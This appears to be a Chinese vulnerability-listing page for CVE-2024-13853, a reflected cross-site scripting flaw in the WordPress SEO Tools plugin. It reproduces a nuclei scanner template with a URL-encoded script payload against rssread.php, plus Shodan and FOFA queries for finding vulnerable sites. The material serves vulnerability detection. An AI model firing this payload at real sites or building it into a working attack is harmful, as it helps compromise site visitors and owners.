CVE-2024-13853: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress SEO Tools Plugin | POC: 已公开

漏洞描述

The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.

PoC代码[已公开]

id: CVE-2024-13853

info:
  name: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.
  reference:
    - https://wpscan.com/vulnerability/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13853
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13853
    cwe-id: CWE-79
    epss-score: 0.00315
    epss-percentile: 0.54078
  metadata:
    max-request: 1
    vendor: WordPress
    product: seo-automatic-seo-tools
    shodan-query: http.html:"seo-automatic-seo-tools"
    fofa-query: body="wp-content/plugins/seo-automatic-seo-tools/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'seo-automatic-seo-tools'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script><script>'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100abb72d3845e4655efc2cb2847022266f4641c9c5e1578301de2dd52149bd7e9e02210080dd2cc48ccc1c714f661d071d8b1b8c77711e198b940f75a5f8417d7bc30a0e:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-13853.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425） 无POC

DataCube3 exec.php SQL 注入漏洞（CVE-2024-25833） 无POC

Appsmith postgres 代码执行漏洞（CVE-2024-55963） 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

Whoogle search 代码执行漏洞（CVE-2024-53305）无POC

Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425）无POC

DataCube3 exec.php SQL 注入漏洞（CVE-2024-25833）无POC

Appsmith postgres 代码执行漏洞（CVE-2024-55963）无POC